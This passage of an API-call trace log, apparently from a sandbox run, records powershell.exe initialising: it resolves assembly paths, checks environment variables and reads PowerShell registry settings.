	[0391.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.841] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0391.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.964] SetConsoleCtrlHandler (HandlerRoutine=0x2b168dc, Add=1) returned 1
	[0392.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0393.435] CoCreateGuid (in: pguid=0x26dbd0 | out: pguid=0x26dbd0*(Data1=0x978abfed, Data2=0xf48e, Data3=0x4868, Data4=([0]=0xbb, [1]=0x5d, [2]=0xd9, [3]=0xb0, [4]=0xdc, [5]=0xc, [6]=0x54, [7]=0x59))) returned 0x0
	[0393.436] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.436] CoTaskMemFree (pv=0x46a9e0) 
	[0393.457] WinSqmIsOptedIn () returned 0x0
	[0393.458] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.458] CoTaskMemFree (pv=0x46a9e0) 
	[0393.458] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.458] CoTaskMemFree (pv=0x46a9e0) 
	[0393.459] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.459] CoTaskMemFree (pv=0x46a9e0) 
	[0393.459] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.459] CoTaskMemFree (pv=0x46a9e0) 
	[0393.460] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.460] CoTaskMemFree (pv=0x46a9e0) 
	[0393.461] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.461] CoTaskMemFree (pv=0x46a9e0) 
	[0393.461] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.461] CoTaskMemFree (pv=0x46a9e0) 
	[0393.462] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.462] CoTaskMemFree (pv=0x46a9e0) 
	[0393.464] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.464] CoTaskMemFree (pv=0x46a9e0) 
	[0393.473] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.473] CoTaskMemFree (pv=0x46a9e0) 
	[0393.477] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.477] CoTaskMemFree (pv=0x46a9e0) 
	[0393.477] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0393.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.478] CoTaskMemFree (pv=0x46a9e0) 
	[0394.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0394.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0394.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0394.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.485] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.485] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0395.486] CoTaskMemFree (pv=0x46a9e0) 
	[0395.487] CoTaskMemAlloc (cb=0xcc) returned 0x478890
	[0395.487] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x478890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0395.487] CoTaskMemFree (pv=0x478890) 
	[0395.487] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d748 | out: phkResult=0x26d748*=0x1d4) returned 0x0
	[0395.487] RegQueryValueExW (in: hKey=0x1d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d6cc, lpData=0x0, lpcbData=0x26d6c8*=0x0 | out: lpType=0x26d6cc*=0x2, lpData=0x0, lpcbData=0x26d6c8*=0x6c) returned 0x0
	[0395.487] CoTaskMemAlloc (cb=0x70) returned 0x4261d0
	[0395.487] RegQueryValueExW (in: hKey=0x1d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d69c, lpData=0x4261d0, lpcbData=0x26d698*=0x6c | out: lpType=0x26d69c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d698*=0x6c) returned 0x0
	[0395.487] CoTaskMemFree (pv=0x4261d0) 
	[0395.487] CoTaskMemAlloc (cb=0xcc) returned 0x478890
	[0395.487] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x478890, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0395.487] CoTaskMemFree (pv=0x478890) 
	[0395.487] CoTaskMemAlloc (cb=0xcc) returned 0x478890
	[0395.487] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x478890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0395.487] CoTaskMemFree (pv=0x478890) 
	[0395.490] RegCloseKey (hKey=0x1d4) returned 0x0
	[0395.490] CoTaskMemAlloc (cb=0xcc) returned 0x478890
	[0395.491] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x478890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0395.491] CoTaskMemFree (pv=0x478890) 
	[0395.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d748 | out: phkResult=0x26d748*=0x1d4) returned 0x0
	[0395.491] RegQueryValueExW (in: hKey=0x1d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d6cc, lpData=0x0, lpcbData=0x26d6c8*=0x0 | out: lpType=0x26d6cc*=0x0, lpData=0x0, lpcbData=0x26d6c8*=0x0) returned 0x2
	[0395.491] RegCloseKey (hKey=0x1d4) returned 0x0
	[0395.494] CoTaskMemAlloc (cb=0x20c) returned 0x468220
	[0395.495] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x468220 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0395.496] CoTaskMemFree (pv=0x468220) 
	[0395.496] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0395.807] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0395.815] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.816] CoTaskMemFree (pv=0x46a9e0) 
	[0395.818] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.818] CoTaskMemFree (pv=0x46a9e0) 
	[0395.821] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.821] CoTaskMemFree (pv=0x46a9e0) 
	[0395.821] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.821] CoTaskMemFree (pv=0x46a9e0) 
	[0395.823] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d538 | out: phkResult=0x26d538*=0x320) returned 0x0
	[0395.824] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x26d54c, lpData=0x0, lpcbData=0x26d548*=0x0 | out: lpType=0x26d54c*=0x1, lpData=0x0, lpcbData=0x26d548*=0x74) returned 0x0
	[0395.825] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x26d4bc, lpData=0x0, lpcbData=0x26d4b8*=0x0 | out: lpType=0x26d4bc*=0x1, lpData=0x0, lpcbData=0x26d4b8*=0x74) returned 0x0
	[0395.825] CoTaskMemAlloc (cb=0x78) returned 0x4261d0
	[0395.825] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x26d48c, lpData=0x4261d0, lpcbData=0x26d488*=0x74 | out: lpType=0x26d48c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d488*=0x74) returned 0x0
	[0395.825] CoTaskMemFree (pv=0x4261d0) 
	[0395.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0395.825] SetErrorMode (uMode=0x1) returned 0x1
	[0395.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d410 | out: lpFileInformation=0x26d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0395.825] SetErrorMode (uMode=0x1) returned 0x1
	[0395.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0395.827] SetErrorMode (uMode=0x1) returned 0x1
	[0395.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d410 | out: lpFileInformation=0x26d410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0395.827] SetErrorMode (uMode=0x1) returned 0x1
	[0395.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0395.831] SetErrorMode (uMode=0x1) returned 0x1
